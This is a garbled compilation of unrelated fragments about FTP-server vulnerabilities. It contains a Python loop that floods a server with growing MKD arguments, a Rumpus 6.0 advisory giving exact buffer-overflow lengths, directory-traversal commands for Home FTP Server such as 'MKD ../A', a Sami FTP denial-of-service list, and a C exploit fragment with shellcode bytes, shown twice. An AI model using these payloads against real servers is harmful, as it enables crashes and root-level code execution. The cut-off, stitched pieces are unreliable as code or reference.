sock.send("user %s\r\n" %username)
r=sock.recv(1024)
sock.send("pass %s\r\n" %passwd)
for i in range(1,200):
sock.send("mkd " + "a" * i +"\r\n")
print "[-] " + ("mkd " + "a" * i +"\r\n")
r=sock.recv(1024)
print "[+] " + r + "\r\n"
for i in range(1,200):
sock.send("mkd " + "b" * i +"\r\n")
Rumpus v6.0 contains two buffer overflow vulnerabilities in its HTTP and FTP modules. The first allows an unauthenticated user to crash Rumpus. The later may result in arbitrary code execution under superuser privilege.
The overflow in HTTP component is caused by the lack of boundary check when parsing for HTTP action verb (GET, POST, PUT, etc.). If the verb is exactly 2908-byte long, the server runs into a segmentation fault and crashes. A manual restart is required. It has been observed that this problem occurs at other verb lengths too. The vulnerability is rated at moderate severity for the lost of service.
The overflow in FTP component is also caused by the lack of length check when parsing FTP commands that take argument such as ``MKD``, ``XMKD``, ``RMD`` and so on. The overflow occurs when the argument is ``strcpy`` to an internal buffer. This buffer is 1024-byte long. When the passed-in argument is longer than 1046 bytes, the instruction pointer will be overwritten. This allows a successful attack to run arbitrary code under the privilege of a superuser (root) by default. Though authorization is required to exploit this security bug, the vulnerability is rated at critical severity because the FTP daemon could be allowing anonymous access.
Workaround
----------
There is no workaround the first bug.
----------------------------------------------------------------
Details (Replicating the issues):
1) Arbitrary File/Directory Manipulation Vulnerability
http://www.syhunt.com/advisories/hfshack.txt
See the "mkd" and "manipf" commands
Example 1 - Arbitrary Directory Creation:
If HFS is running (for e.g.) in the C:\HFS directory, you can
create the C:\Syhunt\ directory by entering:
mkd ..\Syhunt
Home FTP Server is an easy use FTP server Application. Directory Traversal Vulnerability exists in Home FTP Server that
allows an authenticated user to create directories outside the FTP root directory, which may lead to other attacks.
Details:
Home FTP Server fails to sufficiently sanitize user-supplied input in 'MKD' command. An authenticated user could use command
"MKD ../A" to create a folder named "A" outside the FTP root directory.
If you could log on the server successfully, take the following steps to create directories outside the FTP root directory:
1.sock.connect((hostname, 21))
###################################################################################################################
# Sami FTP Server 2.0.* Multiple Remote Vulnerabilities
#
# Bugs :
#
# 1)Multiples remote denial of service (CWD,DELE,MKD,RMD,RETR,RNFR,RNTO,SIZE,STOR)
#
# 2)Remote Buffer overflow (Logs)
#
# Remote Denial of service:
# APPE A => server gone
int main(int argc, char **argv)
{
unsigned char sendbuf[] =
"MKD "
/* .equ vty_info, 0x8182da60 # pointer to VTY info */
/* .equ terminate, 0x80e4086c # kill a process */
"\x3c\x80\x81\x83" /* lis 4,vty_info@ha */
int main(int argc, char **argv)
{
unsigned char sendbuf[] =
"MKD "
/* .equ vty_info, 0x8182da60 # pointer to VTY info */
/* .equ terminate, 0x80e4086c # kill a process */
"\x3c\x80\x81\x83" /* lis 4,vty_info@ha */
